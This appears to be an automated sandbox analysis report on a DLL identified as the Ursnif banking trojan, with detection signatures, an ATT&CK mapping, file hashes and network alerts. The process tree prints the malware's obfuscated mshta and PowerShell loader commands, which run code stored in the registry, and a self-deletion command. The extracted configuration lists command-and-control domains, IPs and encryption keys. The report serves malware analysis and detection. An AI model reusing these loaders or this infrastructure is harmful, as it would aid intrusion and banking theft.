Windows
Analysis Report
qOfIxt1fnQ.dll
Overview
General Information
Detection
Ursnif
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Snort IDS alert for network traffic
Maps a DLL or memory area into another process
Writes to foreign memory regions
Changes memory attributes in foreign processes to executable or writable
Machine Learning detection for sample
Allocates memory in foreign processes
Uses ping.exe to check the status of other devices and networks
Self deletion via cmd delete
Uses ping.exe to sleep
Injects code into the Windows Explorer (explorer.exe)
Modifies the context of a thread in another process (thread injection)
Creates a thread in another existing process (thread injection)
Disables SPDY (HTTP compression, likely to perform web injects)
Writes registry values via WMI
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Searches for the Microsoft Outlook file path
PE file contains strange resources
Drops PE files
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Checks if the current process is being debugged
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
Classification
- System is w10x64
- loaddll32.exe (PID: 5860 cmdline: loaddll32.exe "C:\Users\user\Desktop\qOfIxt1fnQ.dll" MD5: 7DEB5DB86C0AC789123DEC286286B938)
- cmd.exe (PID: 6084 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\qOfIxt1fnQ.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
- rundll32.exe (PID: 4428 cmdline: rundll32.exe "C:\Users\user\Desktop\qOfIxt1fnQ.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
- control.exe (PID: 492 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
- mshta.exe (PID: 6492 cmdline: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Rwr3='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Rwr3).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
- powershell.exe (PID: 5600 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name gcqrbwksb -value gp; new-alias -name jkgyvx -value iex; jkgyvx ([System.Text.Encoding]::ASCII.GetString((gcqrbwksb "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)) MD5: 95000560239032BC68B4C2FDFCDEF913)
- conhost.exe (PID: 5028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- csc.exe (PID: 2964 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zek5yaft\zek5yaft.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
- cvtres.exe (PID: 6624 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES1B0A.tmp" "c:\Users\user\AppData\Local\Temp\zek5yaft\CSC3DAC9030B4CB46878A3398CFC11AF7A7.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
- csc.exe (PID: 5672 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zbedhqob\zbedhqob.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
- cvtres.exe (PID: 5368 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES3EDE.tmp" "c:\Users\user\AppData\Local\Temp\zbedhqob\CSCD26AEEEF9294175AE6FC384D1631824.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
- explorer.exe (PID: 3808 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
- cmd.exe (PID: 628 cmdline: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\qOfIxt1fnQ.dll MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
- conhost.exe (PID: 5532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- PING.EXE (PID: 352 cmdline: ping localhost -n 5 MD5: 6A7389ECE70FB97BFE9A570DB4ACCC3B)
- RuntimeBroker.exe (PID: 4184 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)
- cleanup
{"RSA Public Key": "WDHdIpDR32hiBF82vKyfbd4Aeqb2endsG7KPr9+PRwpFwh6xHOPeXmivTfHV1J5O9BbOekXP+fpLTlNw78j8NdT4sNAaVFSXIxeuXWdoUw6r5lOTidqS1cBNYe3P3AFASRESMg14/OvBfHcw2QScm4OJeiHSYe26nzRyCo9Bsx0twNSvxA9Ev6ecU3aTGDNOX6EO6pfJFTv3oxkLljtitiqLzJjGUeio8ebUBdVSKBHjVo6ZyneL/fS9OUJFMNJ7HNXH2S3/amCXZuSmGf5nGAp2ln8QhGUUaVVkgcswKSlhcM0caruAqxzK8wdEz4NJO3xL/S8BTA8Kjk8SIMljp4q8BLwzx+qosOvcvZK8zl8=", "c2_domain": ["config.edge.skype.com", "cabrioxmdes.at", "gamexperts.net", "185.189.151.181", "185.189.151.186"], "ip_check_url": ["http://ipinfo.io/ip", "http://curlmyip.net"], "serpent_key": "Jv1GYc8A8hCBIeVD", "tor32_dll": "file://c:\\test\\test32.dll", "tor64_dll": "file://c:\\test\\tor64.dll", "server": "50", "sleep_time": "1", "SetWaitableTimer_value(CRC_CONFIGTIMEOUT)": "60", "time_value": "60", "SetWaitableTimer_value(CRC_TASKTIMEOUT)": "60", "SetWaitableTimer_value(CRC_SENDTIMEOUT)": "300", "SetWaitableTimer_value(CRC_KNOCKERTIMEOUT)": "60", "not_use(CRC_BCTIMEOUT)": "10", "botnet": "3000", "SetWaitableTimer_value": "1"}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security | ||
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
No Sigma rule has matched
Timestamp | SID | Source Port | Destination Port | Protocol | Classtype |
---|---|---|---|---|---|
05/04/22-16:20:11.489303 | 2033203 | 49773 | 80 | TCP | A Network Trojan was detected |
05/04/22-16:20:12.290322 | 2033203 | 49773 | 80 | TCP | A Network Trojan was detected |
05/04/22-16:19:50.763686 | 2033203 | 49768 | 80 | TCP | A Network Trojan was detected |
05/04/22-16:20:10.851257 | 2033204 | 49773 | 80 | TCP | A Network Trojan was detected |
AV Detection |
---|
Source: | Malware Configuration Extractor: |
Source: | ReversingLabs: |
Source: | Joe Sandbox ML: |
Source: | Code function: | 2_2_00FE5FBB |
Source: | Static PE information: |
Source: | Binary string: |
Source: | Code function: | 2_2_058065C2 | |
Source: | Code function: | 2_2_058099BC | |
Source: | Code function: | 2_2_0581BAD1 |
Source: | Code function: | 2_2_0580FD47 |
Networking |
---|
Source: | Network Connect: |
Source: | Snort IDS: |
Source: | Process created: |
Source: | ASN Name: |
Source: | HTTP traffic detected: |
Source: | TCP traffic detected without corresponding DNS query: |
Source: | String found in binary or memory: |
Source: | Code function: | 2_2_00FE1CA5 |
Source: | HTTP traffic detected: |
Key, Mouse, Clipboard, Microphone and Screen Capturing |
---|
Source: | File source: |
Source: | Binary or memory string: |
E-Banking Fraud |
---|
Source: | File source: |
Source: | Registry key value created / modified: |
Source: | Code function: | 2_2_00FE5FBB |
System Summary |
---|
Source: | WMI Registry write: |
Source: | Static PE information: |
Source: | Binary or memory string: |
Source: | Key opened: |
Source: | Static PE information: |
Source: | ReversingLabs: |
Source: | Static PE information: |
Source: | Key opened: |
Source: | Process created: |
Source: | Key value queried: |
Source: | File created: |
Source: | Classification label: |
Source: | File read: |
Source: | Section loaded: |
Source: | Code function: | 2_2_00FE68BD |
Source: | Process created: |
Source: | Mutant created: |
Source: | File read: |
Source: | Key opened: |
Source: | Window detected: |
Source: | File opened: |
Source: | Static PE information: |
Source: | Binary string: |
Source: | Code function: | 2_2_00FE7EA9 | |
Source: | Code function: | 2_2_00FE829B | |
Source: | Code function: | 2_2_05823DAF | |
Source: | Code function: | 2_2_05803496 | |
Source: | Code function: | 2_2_058238A9 |
Source: | Static PE information: |
Source: | Code function: | 2_2_0580EC00 |
Source: | Static PE information: |
Source: | Process created: |
Source: | File created: |
Hooking and other Techniques for Hiding and Protection |
---|
Source: | File source: |
Source: | Process created: |
Source: | Registry key monitored for changes: |
Source: | Process information set: |
Malware Analysis System Evasion |
---|
Source: | Process created: |
Source: | Thread sleep time: |
Source: | Evasive API call chain: |
Source: | Last function: |
Source: | Dropped PE file which has not been started: |
Source: | Thread delayed: |
Source: | Window / User API: |
Source: | Check user administrative privileges: |
Source: | Process information queried: |
Source: | Code function: | 2_2_058065C2 |
Source: | Code function: | 2_2_058099BC |
Source: | Code function: | 2_2_0581BAD1 |
Source: | Thread delayed: |
Source: | Code function: | 2_2_0580FD47 |
Source: | Binary or memory string: |
Source: | Code function: | 2_2_0580EC00 |
Source: | Process token adjusted: |
Source: | Process queried: |
Source: | Code function: | 2_2_05808FEC |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | Network Connect: |
Source: | Section loaded: |
Source: | Memory written: |
Source: | Memory protected: |
Source: | Memory allocated: |
Source: | Memory written: |
Source: | Thread register set: |
Source: | Thread created: |
Source: | Process created: |
Source: | Binary or memory string: |
Source: | Queries volume information: |
Source: | Code function: | 2_2_00FE3365 |
Source: | Key value queried: |
Source: | Code function: | 2_2_058181F1 |
Source: | Code function: | 2_2_00FE76BB |
Source: | Code function: | 2_2_00FE6D78 |
Source: | Code function: | 2_2_00FE3365 |
Stealing of Sensitive Information |
---|
Source: | File source: | ||
Remote Access Functionality |
---|
Source: | File source: | ||
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
1 Valid Accounts | 1 Windows Management Instrumentation | 1 Valid Accounts | 1 Valid Accounts | 1 Obfuscated Files or Information | 1 Input Capture | 1 System Time Discovery | Remote Services | 11 Archive Collected Data | Exfiltration Over Other Network Medium | 2 Ingress Tool Transfer | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | 1 Data Encrypted for Impact |
Default Accounts | 3 Native API | Boot or Logon Initialization Scripts | 1 Access Token Manipulation | 1 File Deletion | LSASS Memory | 1 Account Discovery | Remote Desktop Protocol | 1 Email Collection | Exfiltration Over Bluetooth | 2 Encrypted Channel | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | 1 Command and Scripting Interpreter | Logon Script (Windows) | 813 Process Injection | 1 Masquerading | Security Account Manager | 3 File and Directory Discovery | SMB/Windows Admin Shares | 1 Input Capture | Automated Exfiltration | 1 Non-Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 1 Valid Accounts | NTDS | 25 System Information Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | 11 Application Layer Protocol | SIM Card Swap | Carrier Billing Fraud | |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 1 Access Token Manipulation | LSA Secrets | 1 Query Registry | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings | |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | 31 Virtualization/Sandbox Evasion | Cached Domain Credentials | 11 Security Software Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features | |
External Remote Services | Scheduled Task | Startup Items | Startup Items | 813 Process Injection | DCSync | 31 Virtualization/Sandbox Evasion | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact | |
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | 1 Rundll32 | Proc Filesystem | 3 Process Discovery | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue | |
Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Masquerading | /etc/passwd and /etc/shadow | 1 Application Window Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | Data Destruction | |
Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Invalid Code Signature | Network Sniffing | 1 System Owner/User Discovery | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | Data Encrypted for Impact | ||
Compromise Software Dependencies and Development Tools | Windows Command Shell | Cron | Cron | Right-to-Left Override | Input Capture | 11 Remote System Discovery | Replication Through Removable Media | Remote Data Staging | Exfiltration Over Physical Medium | Mail Protocols | Service Stop | ||
Compromise Software Supply Chain | Unix Shell | Launchd | Launchd | Rename System Utilities | Keylogging | 1 System Network Configuration Discovery | Component Object Model and Distributed COM | Screen Capture | Exfiltration over USB | DNS | Inhibit System Recovery |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
50% | ReversingLabs | Win32.Trojan.Jaik | ||
100% | Joe Sandbox ML |
⊘No Antivirus matches
Source | Detection | Scanner | Label | Link | Download |
---|---|---|---|---|---|
100% | Avira | HEUR/AGEN.1245293 | Download File |
⊘No Antivirus matches
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe |
⊘No contacted domains info
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
true |
| unknown | |
true |
| unknown | |
true |
| unknown |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false |
| low | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown |
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
185.189.151.28 | unknown | Switzerland | 51395 | AS-SOFTPLUSCH | true |
Joe Sandbox Version: | 34.0.0 Boulder Opal |
Analysis ID: | 620327 |
Start date and time: | 2022-05-04 16:18:26 +02:00 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 12m 20s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Sample file name: | qOfIxt1fnQ.dll |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211 |
Number of new started processes analysed: | 35 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 2 |
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal100.bank.troj.evad.winDLL@24/18@0/1 |
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
- Excluded IPs from analysis (whitelisted): 13.107.42.16
- Excluded domains from analysis (whitelisted): client.wns.windows.com, config.edge.skype.com.trafficmanager.net, store-images.s-microsoft.com, login.live.com, l-0007.config.skype.com, config-edge-skype.l-0007.l-msedge.net, settings-win.data.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, l-0007.l-msedge.net, arc.msn.com, config.edge.skype.com
- Execution Graph export aborted for target mshta.exe, PID 6492 because there are no executed functions
- Not all processes were analyzed, report is missing behavior information
- Report size exceeded maximum capacity and may have missing behavior information.
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtProtectVirtualMemory calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
- Report size getting too big, too many NtReadVirtualMemory calls found.
- VT rate limit hit for: qOfIxt1fnQ.dll
Time | Type | Description |
---|---|---|
16:19:47 | API Interceptor | |
16:20:22 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
185.189.151.28 | Get hash | malicious | Browse | ||
Get hash | malicious | Browse |
⊘No context
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
AS-SOFTPLUSCH | Get hash | malicious | Browse |
⊘No context
⊘No context
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | modified |
Size (bytes): | 11606 |
Entropy (8bit): | 4.883977562702998 |
Encrypted: | false |
SSDEEP: | 192:h9smd3YrKkGdcU6CkVsm5emla9sm5ib4q4dVsm5emdjxoeRjp5Kib4nVFn3eGOVo:ySib4q4dvEib4nVoGIpN6KQkj2frkjhQ |
MD5: | 243581397F734487BD471C04FB57EA44 |
SHA1: | 38CB3BAC7CDC67CB3B246B32117C2C6188243E77 |
SHA-256: | 7EA86BC5C164A1B76E3893A6C1906B66A1785F366E092F51B1791EC0CC2AAC90 |
SHA-512: | 1B0B1CD588E5621F63C4AACC8FF4C111AD9148D4BABE65965EC38EBD10D559A0DFB9B610CA3DF1E1DD7B1842B3E391D6804A3787B6CD00D527A660F444C4183A |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe |
File Type: | |
Category: | modified |
Size (bytes): | 1336 |
Entropy (8bit): | 4.0228017303072 |
Encrypted: | false |
SSDEEP: | 24:He6m9Z3Kqj2ZH5hKdNwI+ycuZhNRakSfPNnq9Sd:+t3p2ZnKdm1ulRa39q9C |
MD5: | 374A48CBB719CF1410CFC123BA85C56A |
SHA1: | A453C8195F0E9BCE608CE693314522BBB5DB7357 |
SHA-256: | 5EE33E1AB6193CE0E93EBC0508F9E4D180B514161461C46CDE55DEA2763D0056 |
SHA-512: | 3CA404BB447C645FFA4D9A96FB9E998AF080AC61C1EC822BA16FEB63C9F050BDD639571D29447172BB0DFA58AA0CF85923DCAF31D6FA821CF5CB8476C9708E20 |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe |
File Type: | |
Category: | modified |
Size (bytes): | 1336 |
Entropy (8bit): | 4.018016439631709 |
Encrypted: | false |
SSDEEP: | 24:HMm9wWWCuZHGhKdNwI+ycuZhNnakS5PNnq9Sd:6WGZcKdm1ulna37q9C |
MD5: | 998CB2AA26F5148ED793C167B720065C |
SHA1: | 6F981E6A61E9835657168C2B9F888A227B088529 |
SHA-256: | C9668C58126A7953DDB247E53136FBA46312DA3D43C4985FD397319FE9F4BEAB |
SHA-512: | B034CECB30EEC21DE7B53267608ED335EAC5AFAB175483700CB58173AD91C289FEC69DDCCAB3163A19982C41FF578DEECEF53EF49FFB459DCE18D12F9DE2C74A |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1 |
Entropy (8bit): | 0.0 |
Encrypted: | false |
SSDEEP: | 3:U:U |
MD5: | C4CA4238A0B923820DCC509A6F75849B |
SHA1: | 356A192B7913B04C54574D18C28D46E6395428AB |
SHA-256: | 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B |
SHA-512: | 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1 |
Entropy (8bit): | 0.0 |
Encrypted: | false |
SSDEEP: | 3:U:U |
MD5: | C4CA4238A0B923820DCC509A6F75849B |
SHA1: | 356A192B7913B04C54574D18C28D46E6395428AB |
SHA-256: | 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B |
SHA-512: | 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 652 |
Entropy (8bit): | 3.1002021419389396 |
Encrypted: | false |
SSDEEP: | 12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryycak7Ynqq/xPN5Dlq5J:+RI+ycuZhNnakS5PNnqX |
MD5: | 31851C22560D8CF705F72343CE5E3164 |
SHA1: | E18F381430AB4E8688785356BFF7156A34422D7A |
SHA-256: | 21B5FF2331CB7C23694B56EA18671FD81201849885EA382314949585037537B9 |
SHA-512: | A8AE5DFE25991325A0CB66392C6BBB73323C8D775A303F921C1EB654A56998E8824AD3EA27C3C6E87F95312E32EE8171DD960792D6A311B9AB0D8D7CF1AF24D1 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 392 |
Entropy (8bit): | 4.988829579018284 |
Encrypted: | false |
SSDEEP: | 6:V/DsYLDS81zuJ6VMRSRa+eNMjSSRr92B7SSRNAtwy:V/DTLDfuk9eg5r9yeqy |
MD5: | 80545CB568082AB66554E902D9291782 |
SHA1: | D013E59DC494D017F0E790D63CEB397583DCB36B |
SHA-256: | E15CA20CFE5DE71D6F625F76D311E84240665DD77175203A6E2D180B43926E6C |
SHA-512: | C5713126B0CB060EDF4501FE37A876DAFEDF064D9A9DCCD0BD435143DAB7D209EFBC112444334627FF5706386FB2149055030FCA01BA9785C33AC68E268B918D |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 377 |
Entropy (8bit): | 5.251122514567512 |
Encrypted: | false |
SSDEEP: | 6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2cNwi23fuc0zxs7+AEszIcNwi23fui:p37Lvkmb6KwZWnWZEJZWi |
MD5: | 6BEAEAA18A18F11A3948D63B1B3F8C32 |
SHA1: | 3312A982933EE78A9E885480F4C1F9CBE66E22D7 |
SHA-256: | 9107AF0B8A89D0B05BDF59FB9D6F00EB02E082FAC24EFD0580E14863F1B3EF93 |
SHA-512: | B5D5736B9817D960A4573EC38DCFD0A832B5327C01A513A66F5AD60DA4A7271FC2C897AF2AFC2DD6E5A216C37414761E7643602EEDA2AFC427D4025FC687DC7C |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 3584 |
Entropy (8bit): | 2.591873569693151 |
Encrypted: | false |
SSDEEP: | 24:etGSV/u2Bg85z7xlfwZD6ngdWqtkZfJkfWI+ycuZhNnakS5PNnq:6oYb5hFCD6KWdJJr1ulna37q |
MD5: | 0F3C2AD5E4964A882F96D41B812C6B51 |
SHA1: | F8344BE921A55E2FCDEDFEEBB411884370AD183B |
SHA-256: | 46C531D304718E747B3C85947F1C9E593784062451F25109A64B3E61FEA940DA |
SHA-512: | 8551F10E18E0A2477BE548C9C5A2D268DE9B8F15472E8FFD2E2849AA0E540CEA89EA34065423971DB8276D7AE24EC0E6E163F09E4B313EE49EAF758AD00B9CA0 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | modified |
Size (bytes): | 874 |
Entropy (8bit): | 5.33360462315722 |
Encrypted: | false |
SSDEEP: | 24:AId3ka6KgWUEvWbKaM5DqBVKVrdFAMBJTH:Akka67WUEvWbKxDcVKdBJj |
MD5: | F26BA411CDAFAC953F6F662958CFA7FC |
SHA1: | 50253F14979B6BDCFE5775B660B7D86638A5BC0E |
SHA-256: | 712F6E5FE66B20D71FC2775C76EEDFEFD1BF2D6741815732A5BF81842FA5C8ED |
SHA-512: | 5BAA4E0DDE38F9E4F8F8D03822AC864034770BD30677462186E58E9AF3D42ED3E8523B3E9637A9E45DBE68D0BDAFBC76C86911F46E05CA649980AF0221C67C61 |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 652 |
Entropy (8bit): | 3.1047026516417726 |
Encrypted: | false |
SSDEEP: | 12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryyOak7Ynqq3PPN5Dlq5J:+RI+ycuZhNRakSfPNnqX |
MD5: | 5AD386D1E925F39E50DD975A24323CE0 |
SHA1: | B7CE53658A46267327E53DC30B32D71CB99B6F55 |
SHA-256: | 81B59EFCF69B41434BE6EDCF3EA113398252BC5CECD0A2F25BBFCB788C5A17A9 |
SHA-512: | 103F6FFB76816E098AAAEF6EA8DA5CB77E931C0E91286688CE668C8DBBCBFB8C22E1658E9EE572878441F9B3E969F0F97DA6AA3C75091197F15C8A13FFF7C55C |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 403 |
Entropy (8bit): | 5.058106976759534 |
Encrypted: | false |
SSDEEP: | 6:V/DsYLDS81zuJiWmMRSR7a1nQTsyBSRa+rVSSRnA/fpM+y:V/DTLDfuQWMBDw9rV5nA/3y |
MD5: | 99BD08BC1F0AEA085539BBC7D61FA79D |
SHA1: | F2CA39B111C367D147609FCD6C811837BE2CE9F3 |
SHA-256: | 8DFF0B4F90286A240BECA27EDFC97DCB785B73B8762D3EAE7C540838BC23A3E9 |
SHA-512: | E27A0BF1E73207800F410BA9399F1807FBA940F82260831E43C8F0A8B8BFA668616D63B53755526236433396AF4EF21E1EB0DFA9E92A0F34DB8A14C292660396 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 377 |
Entropy (8bit): | 5.210292708919398 |
Encrypted: | false |
SSDEEP: | 6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2cNwi23fPKZE/0zxs7+AEszIcNwi23fPKZEuA:p37Lvkmb6KwZ3KZEcWZEJZ3KZEuA |
MD5: | 2DBC44A207EDD752053B85C10F469D6C |
SHA1: | F8E49A5B48F33427CC7D5307413F20A65FDBB92C |
SHA-256: | 6CB42564BF4BFDA3F40F18736F0B99707C5ACCFF82C3DF99F993D8100AFDDD95 |
SHA-512: | 8981DDC8840D1A9A1F203348C1AADD611F029ED76CCCB5160CD2FED4A5E15F8CB8AD7C9502C3C48AC6B740EFF7F211B511FC8AC4E5FE33E269D971E23BFCB320 |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 3584 |
Entropy (8bit): | 2.6169766452209187 |
Encrypted: | false |
SSDEEP: | 24:etGSE8OmU0t3lm85xWAseO4zSQ64pfUPtkZfL78xVUWI+ycuZhNRakSfPNnq:6+XQ3r5xNONQfUuJL78v31ulRa39q |
MD5: | 201BF92233A7B7012A72D095C3394705 |
SHA1: | 57D40D95DF82DB178AF86679A10E875F2BDAFA14 |
SHA-256: | FAAC47DDB1D3AAF6556F8432A6A4E7A42C5392768A0323A4671235D555010F07 |
SHA-512: | 7ED9272880C05FE32E25A41545F9944C9395BFD0FD9EF841508DFA57ABA4056F69D9D2F5163721E888DDE952A5172BCD631632432CBBCE78C3E113AA2BABF994 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | modified |
Size (bytes): | 874 |
Entropy (8bit): | 5.316339111104929 |
Encrypted: | false |
SSDEEP: | 24:AId3ka6Kg3K6NEv3K6u1KaM5DqBVKVrdFAMBJTH:Akka673vEv3CKxDcVKdBJj |
MD5: | 0172659AE1F94669437848B8E4F71542 |
SHA1: | 74189A803FB26C1CCF4C311069061690ED4685B4 |
